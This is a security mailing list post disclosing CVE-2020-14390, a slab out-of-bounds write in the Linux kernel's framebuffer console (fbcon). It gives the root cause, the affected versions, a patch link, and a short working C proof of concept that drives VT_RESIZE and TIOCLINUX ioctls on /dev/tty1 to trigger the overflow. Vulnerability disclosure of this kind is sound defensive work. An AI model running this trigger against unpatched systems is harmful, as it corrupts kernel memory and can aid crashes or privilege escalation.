oss-sec mailing list archives
CVE-2020-14390: Linux kernel: slab-out-of-bounds in fbcon
From: Minh Yuan <yuanmingbuaa () gmail com>
Date: Tue, 15 Sep 2020 18:23:20 +0800
Hi, I found a out-of-bound write in fbcon_redraw_softback while the kernel version <= 5.9.rc5. The oldest affected kernel version is 2.2.3. The root cause of this vulnerability is that the value of vc->vc_origin is not updated in time while invoking vc_do_resize. This is my PoC (need the permission to open and write the tty, and need to have a fbcon driver): // author by ziiiro@thu #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <sys/types.h> #include <sys/stat.h> #include <sys/ioctl.h> #include <fcntl.h> int main(int argc, char** argv) { int fd = open("/dev/tty1", O_RDWR, 0); unsigned short size1[3] = {3, 0x21, 0}; ioctl(fd, 0x5609, size1); // VT_RESIZE for (int i = 0; i < 30; i++) { write(fd, "\x0a", 1); } signed int args[3] = {13, -5, 0}; ioctl(fd, 0x541c, args); // TIOCLINUX unsigned short size2[3] = {3, 0x39, 0}; ioctl(fd, 0x5609, size2); // VT_RESIZE } This is the commit to patch the issue: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=50145474f6ef4a9c19205b173da6264a644c7489 Thanks, Yuan Ming, Tsinghua University
Current thread:
- CVE-2020-14390: Linux kernel: slab-out-of-bounds in fbcon Minh Yuan (Sep 15)